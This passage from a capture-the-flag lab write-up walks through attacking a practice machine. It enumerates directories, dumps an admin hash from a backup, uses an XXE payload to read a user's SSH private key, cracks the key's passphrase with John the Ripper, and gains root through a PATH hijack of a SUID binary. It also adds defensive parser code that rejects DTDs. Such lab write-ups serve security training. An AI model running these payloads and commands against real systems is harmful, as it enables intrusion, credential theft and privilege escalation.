Once we have the credentials, we can use them to log in to the admin page at port 8765. On this page we can "Add a comment on the website". If we inspect the source code of the site, we find the following.
This gives us three pieces of valuable information:
Someone called Barry can log in with his SSH key.
We can perform an XXE attack, as we can pass XML to the submit form.
The path /auth/dontforget.bak looks interesting
If we start from the bottom, we can download the dontforget.bak file and view its content with the cat command.
This gives us the basic XML form we need to submit. We can combine it with an XXE payload to read Barry's id_rsa key.
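From the defender's side, the fix for this form is to refuse any submission that carries a DTD at all, so that an entity declaration like the one above is never expanded. The following is an added example (not code from the writeup or from the room's application) that parses the comment format from dontforget.bak with Python's standard-library expat parser and rejects DOCTYPE/ENTITY declarations before the tree is built; the element names and samples are taken from the page, the function names are mine.

```python
import xml.parsers.expat as expat
from xml.etree import ElementTree as ET

class DtdNotAllowed(ValueError):
    """Submitted XML carried a DOCTYPE or entity declaration."""

def _reject_dtd(*_args):
    # Fires on any <!DOCTYPE ...> or <!ENTITY ...>; the exception aborts Parse().
    raise DtdNotAllowed("DOCTYPE/ENTITY declarations are not accepted")

def parse_comment(xml_text: str) -> dict:
    """Return {name, author, com} from a <comment> submission, or raise."""
    # Pass 1: a bare expat parser whose DTD hooks raise, so the declaration
    # is rejected before any entity could be expanded or any file read.
    pre = expat.ParserCreate()
    pre.StartDoctypeDeclHandler = _reject_dtd
    pre.EntityDeclHandler = _reject_dtd
    pre.Parse(xml_text, True)
    # Pass 2: build the tree only for input that passed the DTD check.
    root = ET.fromstring(xml_text)
    if root.tag != "comment":
        raise ValueError(f"unexpected root element <{root.tag}>")
    fields = {}
    for tag in ("name", "author", "com"):
        node = root.find(tag)
        fields[tag] = (node.text or "").strip() if node is not None else ""
    return fields

def is_accepted(xml_text: str) -> bool:
    """True if the submission parses cleanly, False if it carried a DTD."""
    try:
        parse_comment(xml_text)
        return True
    except DtdNotAllowed:
        return False

# Constructed samples: the benign form from dontforget.bak (body shortened)
# and the same form with the external-entity declaration shown on the page.
BENIGN = """<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>This paragraph was a waste of time and space.</com>
</comment>"""
MALICIOUS = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [<!ELEMENT data ANY ><!ENTITY name SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<comment><name>&name;</name><author>Barry Clad</author><com>x</com></comment>"""
```

Even a harmless-looking `<!DOCTYPE comment>` with no internal subset is refused, which is the intended behaviour: a comment form has no legitimate reason to ship a DTD.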
id_rsa
Once the id_rsa is obtained, we can try to log in over SSH as Barry. Remember to set the key's permissions with chmod 600 id_rsa.
However, we are prompted for a passphrase, which is not the same as the password we used to log in to the admin page.
Obtain the password with John
We can use ssh2john and John the Ripper to crack the passphrase.
First, convert the key to the right format, then run John against it.
Get first flag
Once we have logged in as Barry, we can get the first flag by viewing the file /home/barry/user.txt
Get root
Now we start by looking for SUID binaries with the command find / -perm -u=s -type f 2>/dev/null
which shows us that /home/joe/live_log is executed as root.
If we use strings on that file, we find this interesting snippet.
tail -f /var/log/nginx/access.log
This seems to be a command that the binary executes. The proper way of confirming this is probably some reverse engineering, but since we roughly know what to look for, this is sufficient.
Let's try to create a custom tail binary and hijack the PATH. The content of tail should look like this: a Bash script that copies /bin/bash to the /tmp folder and sets the correct permissions.
Next, we modify the PATH variable and execute the live_log binary.
If everything was successful, we can now obtain a shell with root privileges by executing /tmp/bash -p
We can verify that we have root privileges with the id command.
gobuster dir -u $IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt | tee gobuster.log
file users.bak
users.bak: SQLite 3.x database, last written using SQLite version 3034001, file counter 2, database pages 2, cookie 0x1, schema 4, UTF-8, version-valid-for 2
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
users
sqlite> SELECT * FROM users;
admin|1868e36a6d2b17d4c2745f1659433a54d4bc5f4b
<script type="text/javascript">
//document.cookie = "Example=/auth/dontforget.bak";
function checktarea() {
let tbox = document.getElementById("box").value;
if (tbox == null || tbox.length == 0) {
alert("Insert XML Code!")
}
}
</script>
</head>
<body>
<!-- Barry, you can now SSH in using your key!-->
cat dontforget.bak
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY name SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<comment>
<name>&name;</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
ssh barry@$IP -i id_rsa
ssh2john id_rsa > barryhash
john barryhash --wordlist=/usr/share/wordlists/rockyou.txt